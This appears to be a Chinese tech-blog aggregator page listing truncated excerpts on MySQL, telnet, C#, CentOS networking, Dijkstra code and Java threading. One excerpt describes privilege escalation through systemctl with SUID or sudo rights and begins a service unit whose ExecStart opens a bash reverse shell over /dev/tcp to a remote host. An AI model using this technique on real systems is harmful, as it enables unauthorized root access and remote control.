在给2台mysql数据库配置主从同步,配置完成后,在slave上执行“start slave;”报错,提示:ERROR 1200 (HY000): The server is not configured as slave; fix in config file or with CHANGE MAS ...
分类:
数据库 时间:
2021-05-24 17:15:05
阅读次数:
0
安装教程: https://www.cnblogs.com/laumians-notes/p/9069498.html https://blog.csdn.net/weixin_42869365/article/details/83472466 启动 net start mysql 登录 (1234 ...
分类:
数据库 时间:
2021-05-24 16:08:31
阅读次数:
0
开篇废话 telnet 很重要,当升级ssh失败时,无法通过ssh连接服务器时需要用 telnet 连接。 1 ssh -V 查询当前版本 openssl version 2 安装telnet-server yum install xinetd telnet-server -y 2.1 离线安装? ...
分类:
Web程序 时间:
2021-05-24 16:05:20
阅读次数:
0
最近弄得一个小软件,需要用到富文本编辑器,richtextbox,一开始以为是和文本框一样的用法,但是实践起来碰壁之后才知道并不简单。 richtextbox 类似于Word,是一个可编辑的控件。结构图(来自网络) 我的主要用途是用来支持一个基于C#的考试系统,由于考试科目涉及到图片以及还有复杂的数 ...
当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. ...
分类:
其他好文 时间:
2021-05-24 14:55:34
阅读次数:
0
老规矩,先上代码 #date:2021-5-17 #author:Linuas #b站:会武术的白猫 import copy def Dijkstra(network,s,d):#迪杰斯特拉算法算s-d的最短路径,并返回该路径和代价 #print("Start Dijstra Path……") pa ...
分类:
编程语言 时间:
2021-05-24 14:13:38
阅读次数:
0
Commission Directive 2003-94-EC of 8 October 2003 laying down the principles and guidelines of good manufacturing practice in respect of medicinal pro ...
分类:
其他好文 时间:
2021-05-24 13:33:30
阅读次数:
0
今天刚在VMware15里装了CentOS 7按照教程修改 /etc/sysconfig/network-scripts/ifcfg-ens33后service network start失败。 参考了网上的一些解决方法,最后解决过程如下: 先保证虚拟机连上网,这儿我一开始遇到了个“无法将ether ...
分类:
Web程序 时间:
2021-05-24 13:11:02
阅读次数:
0
1.前言 曾多次对unity或者c#在使用单例时的一些问题进行过讨论,即有充满戾气的讨论,也有理性的总结与封装(封装成一个抽象类,使用时直接继承),但多次使用时还是有一些不同的想法,故此文章诞生。此文将从纯C# 层展开。 2.单例的几种方式 此部分为纯C#层面 2.1 非线程安全模式 此种线程不安全 ...
分类:
其他好文 时间:
2021-05-24 12:40:47
阅读次数:
0
public class WindowSell2 { private int num=0; public synchronized void increade() throws InterruptedException{ while (num != 0){ this.wait(); } num++; ...
分类:
编程语言 时间:
2021-05-24 12:36:19
阅读次数:
0